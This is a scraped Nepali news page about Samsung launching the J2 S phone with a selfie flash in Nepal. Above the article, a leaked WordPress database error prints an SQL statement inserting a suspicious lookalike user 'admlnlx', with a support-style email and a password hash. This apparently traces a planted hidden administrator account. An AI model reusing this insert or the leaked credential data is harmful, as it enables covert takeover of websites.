WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfC2x5BDIaRnqDH27DK9lwUQQIjgFB0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 14:56:48', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
सामसुङको सेल्फी फ्ल्याससहितको जेटु एस मोबाईल बजारमा – Gaule Khabar

सामसुङको सेल्फी फ्ल्याससहितको जेटु एस मोबाईल बजारमा

सामसुङको सेल्फी फ्ल्याससहितको जेटु एस मोबाईल बजारमा

काठमाडौं, पुस १०–

सामसुङले नेपालमा सेल्फी फ्ल्याससहितको जेटु एस मोबाईल बजारमा ल्याएको छ ।

सामसुङ जे सिरिज अन्तरगत नयाँ मोडेलेको मोबाईल नेपालमा ल्याएको हो । यस मोबाईलमा फोरजी नेट समेत चल्ने छ । सामसुङका एचएसपी डिभिजनका डेपुटी जेनरल म्यानेजर प्रणयरत्न स्थापितले भन्नुभयो–“यसको मूल्य १३ हजार ९ सय ९० रुपैयाँ पर्न जान्छ, यो नेपालका लागि निकै उपयुक्त मोबाईल हो ।’ यो मोबाईलको स्क्रिन ५ इन्चको रहेको छ भने तीन रंंगमा उपलब्ध छ । यस मोबाईलको सेल्फी क्यामरा फ्ल्याससहितको ५ मेगा पिक्सेल र पछाडी ८ मेगा पिक्सेलको क्यामरा रहेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका